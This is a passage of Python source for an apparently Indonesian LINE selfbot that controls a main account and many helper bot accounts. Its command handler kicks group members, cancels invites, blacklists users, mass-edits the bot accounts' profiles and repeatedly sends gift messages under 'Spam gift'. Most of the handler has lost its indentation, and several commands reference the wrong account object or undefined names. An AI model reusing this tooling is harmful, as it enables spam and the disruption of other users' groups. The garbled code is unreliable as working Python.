    msg.contentMetadata = contentMetadata
    msg.contentType = contentType
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def sendImage(self, to_, path):
    """Send the image file at *path* to chat *to_* via the OBS upload API.

    Fix: the original opened *path* twice (once for the upload, once just
    to measure its size) and never closed either handle — a file
    descriptor leak. The size now comes from ``os.path.getsize`` and the
    single upload handle is closed by the ``with`` block.

    Raises Exception('Upload image failure.') unless the endpoint
    answers HTTP 201.
    """
    M = Message(to=to_, text=None, contentType=1)
    M.contentMetadata = None
    M.contentPreview = None
    # Send a placeholder image message first; its id becomes the upload oid.
    M2 = self._client.sendMessage(0, M)
    M_id = M2.id
    params = {
        'name': 'media',
        'oid': M_id,
        'size': os.path.getsize(path),
        'type': 'image',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    with open(path, 'rb') as image_file:
        files = {
            'file': image_file,
        }
        r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
    if r.status_code != 201:
        raise Exception('Upload image failure.')
    return True
def sendImage2(self, to_, path):
    """Send the image file at *path* to chat *to_* (naver.jp endpoint).

    Fix: like ``sendImage``, the original opened *path* twice without
    closing either handle (fd leak). Size is now read from the
    filesystem and the upload handle is closed by the ``with`` block.

    Raises Exception('Upload image failure.') unless the endpoint
    answers HTTP 201.
    """
    M = Message(to=to_, contentType=1)
    M.contentMetadata = None
    M.contentPreview = None
    # The placeholder message's id is used as the upload oid.
    M_id = self._client.sendMessage(M).id
    params = {
        'name': 'media',
        'oid': M_id,
        'size': os.path.getsize(path),
        'type': 'image',
        'ver': '1.0',
    }
    data = {
        'params': json.dumps(params)
    }
    with open(path, 'rb') as image_file:
        files = {
            'file': image_file,
        }
        r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
    if r.status_code != 201:
        raise Exception('Upload image failure.')
    return True
def sendImageWithURL(self, to_, url):
    """Download *url* to a temp file, then send it with ``self.sendImage``.

    Fixes:
    - ``randint`` was called without being imported (the file imports the
      ``random`` module, not the name) — NameError at runtime; now
      ``random.randint``.
    - the download was written in text mode ``'w'``, which corrupts
      binary image data on platforms that translate newlines; now
      ``'wb'`` with the file closed by the ``with`` block.

    Raises Exception('Download image failure.') on a non-200 response;
    sendImage is retried once before its failure is re-raised.
    """
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(path, 'wb') as f:
            shutil.copyfileobj(r.raw, f)
    else:
        raise Exception('Download image failure.')
    try:
        self.sendImage(to_, path)
    except Exception:
        # One retry for transient upload failures, then surface the error.
        try:
            self.sendImage(to_, path)
        except Exception as e:
            raise e
def sendMessage(to, text, contentMetadata={}, contentType=0):
    """Third duplicate of sendMessage: builds a Message and increments
    the per-target counter in ``messageReq``; nothing is transmitted.

    NOTE(review): ``Message``, ``profile`` and ``messageReq`` are free
    names defined outside this chunk — verify they exist at runtime.
    """
    outgoing = Message()
    outgoing.to = to
    outgoing.from_ = profile.mid
    outgoing.text = text
    outgoing.contentType = contentType
    outgoing.contentMetadata = contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
    """Record the first read by each member of a watched chat.

    When the chat (op.param1) is being tracked in wait2['readPoint'],
    the reader's display name is appended once to wait2['readMember']
    and mirrored into wait2['ROM']. Any lookup failure is silently
    ignored (best-effort, preserving the original bare-except behavior).
    """
    try:
        if op.param1 not in wait2['readPoint']:
            return
        reader = cl.getContact(op.param2).displayName
        if reader not in wait2['readMember'][op.param1]:
            wait2['readMember'][op.param1] += "\n・" + reader
            wait2['ROM'][op.param1][op.param2] = "・" + reader
    except:
        pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace(" ",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment1"])
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text.lower() == 'help':
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
elif ("Gn:" in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn:","")
ki.updateGroup(group)
else:
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gn ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:","")
cl.kickoutFromGroup(msg.to,[midd])
elif "Invite:" in msg.text:
midd = msg.text.replace("Invite:","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "Me" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif "Mybots" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
cl.sendMessage(msg)
elif "B1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "B2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "B3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "B4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "B5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif "B6" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki6mid}
ki6.sendMessage(msg)
elif "Creator" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u84734a2bb2201d465e6015f90dc462f0'}
cl.sendMessage(msg)
elif msg.text in ["Allgift","B1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","i gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Allgift","B2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Allgift","B3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Allgift","B4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","B5 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["Allgift","B6 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki6.sendMessage(msg)
elif msg.text in ["Allgift","B7 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki7.sendMessage(msg)
elif msg.text in ["Allgift","B8 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '13'}
msg.text = None
ki8.sendMessage(msg)
elif msg.text in ["Allgift","B9 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '11'}
msg.text = None
ki9.sendMessage(msg)
elif msg.text in ["Allgift","B10 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki10.sendMessage(msg)
elif msg.text in ["Allgift","B11 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki11.sendMessage(msg)
elif msg.text in ["Allgift","B12 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki12.sendMessage(msg)
elif msg.text in ["Allgift","B13 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '9'}
msg.text = None
ki13.sendMessage(msg)
elif msg.text in ["Allgift","B14 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '1'}
msg.text = None
ki14.sendMessage(msg)
elif msg.text in ["Allgift","B15 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki15.sendMessage(msg)
elif msg.text in ["Allgift","B16 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki16.sendMessage(msg)
elif msg.text in ["Allgift","B17 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki17.sendMessage(msg)
elif msg.text in ["Allgift","B18 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki18.sendMessage(msg)
elif msg.text in ["Spam gift"]:
#if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
#-------------------------Audio------------------------------------------#
#------------------------------------------------------------------------#
elif msg.text in ["B Cancel","Cancel dong","Bcancel"]:
if msg.toType == 2:
group = ki.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"invitan tidak ada")
elif msg.text in ["Cancel","cancel"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No invites👈")
else:
cl.sendText(msg.to,"Invite people inside not👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan👈")
else:
cl.sendText(msg.to,"invitan tidak ada")
#-------------------------
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Clink"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
cl.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Curl"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close 👈")
else:
cl.sendText(msg.to,"URL close 👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ")
elif "Ginfo" == msg.text:
if msg.toType == 2:
# if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "🗜️" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "🗜️" + gCreator + "\n\n[Group Status]\n" + "⛔️Status QR 👉" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
#else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Creator" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': 'ufce863f62f40706c01fa4a3c3c4cb096'}
cl.sendMessage(msg)
elif "Mymid" == msg.text:
cl.sendText(msg.to,mid)
elif "B1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "B2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "B3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "B4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "B5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "B6 mid" == msg.text:
ki6.sendText(msg.to,ki6mid)
elif "All mid" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
ki6.sendText(msg.to,ki6mid)
elif "TL:" in msg.text:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "All:" in msg.text:
string = msg.text.replace("All:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki7.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki8.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki9.getProfile()
profile.displayName = string
ki9.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki10.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
elif "Allbio:" in msg.text:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki6.getProfile()
profile.statusMessage = string
ki6.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki7.getProfile()
profile.statusMessage = string
ki7.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki8.getProfile()
profile.statusMessage = string
ki8.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki9.getProfile()
profile.statusMessage = string
ki9.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki10.getProfile()
profile.statusMessage = string
ki10.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki11.getProfile()
profile.statusMessage = string
ki11.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki12.getProfile()
profile.statusMessage = string
ki12.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki13.getProfile()
profile.statusMessage = string
ki13.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki14.getProfile()
profile.statusMessage = string
ki14.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki15.getProfile()
profile.statusMessage = string
ki15.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki16.getProfile()
profile.statusMessage = string
ki16.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki17.getProfile()
profile.statusMessage = string
ki17.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki18.getProfile()
profile.statusMessage = string
ki18.updateProfile(profile)
elif "Mybio:" in msg.text:
string = msg.text.replace("Mybio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio👉" + string + "👈")
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
#------------------------------------------------------------------------------------------#
elif "Cn " in msg.text:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉 " + string + "👈")
#---------------------------------------------------------
elif "B1name " in msg.text:
string = msg.text.replace("B1name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B2name " in msg.text:
string = msg.text.replace("B2name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B3name " in msg.text:
string = msg.text.replace("B3name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B4name " in msg.text:
string = msg.text.replace("B4name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B5name " in msg.text:
string = msg.text.replace("B5name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to," Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B6name " in msg.text:
string = msg.text.replace("B6name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
ki6.sendText(msg.to,"Update Names��" + string + "👈")
#---------------------------------------------------------
elif "B7name " in msg.text:
string = msg.text.replace("B7name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki7.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
ki7.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B8name " in msg.text:
string = msg.text.replace("B8name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki8.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
ki8.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B9name " in msg.text:
string = msg.text.replace("B9name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki9.getProfile()
profile.displayName = string
ki9.updateProfile(profile)
ki9.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B10name " in msg.text:
string = msg.text.replace("B10name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki10.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
ki10.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B11name " in msg.text:
string = msg.text.replace("B11name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki11.getProfile()
profile.displayName = string
ki11.updateProfile(profile)
ki11.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B12name " in msg.text:
string = msg.text.replace("B12name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki12.getProfile()
profile.displayName = string
ki12.updateProfile(profile)
ki12.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B13name " in msg.text:
string = msg.text.replace("B13name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki13.getProfile()
profile.displayName = string
ki13.updateProfile(profile)
ki13.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B14name " in msg.text:
string = msg.text.replace("B14name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki14.updateProfile(profile)
ki14.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B15name " in msg.text:
string = msg.text.replace("B15name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki15.getProfile()
profile.displayName = string
ki15.updateProfile(profile)
ki15.sendText(msg.to," Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B16name " in msg.text:
string = msg.text.replace("B16name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki16.getProfile()
profile.displayName = string
ki16.updateProfile(profile)
ki16.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B17name " in msg.text:
string = msg.text.replace("B17name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki17.getProfile()
profile.displayName = string
ki17.updateProfile(profile)
ki17.sendText(msg.to,"Update Names👉" + string + "👈")
#---------------------------------------------------------
elif "B18name " in msg.text:
string = msg.text.replace("B18name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki18.getProfile()
profile.displayName = string
ki18.updateProfile(profile)
ki8.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "Sc:" in msg.text:
mmid = msg.text.replace("Mid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact:on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already open ✔")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact:off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off ✖")
else:
cl.sendText(msg.to,"It is already off ✖")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"already Close ✔")
elif msg.text in ["Pro:on"]:
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Enable✔")
else:
cl.sendText(msg.to,"It is already On ✔")
elif msg.text in ['Prolink:on']:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Link Protection Enable ✔")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
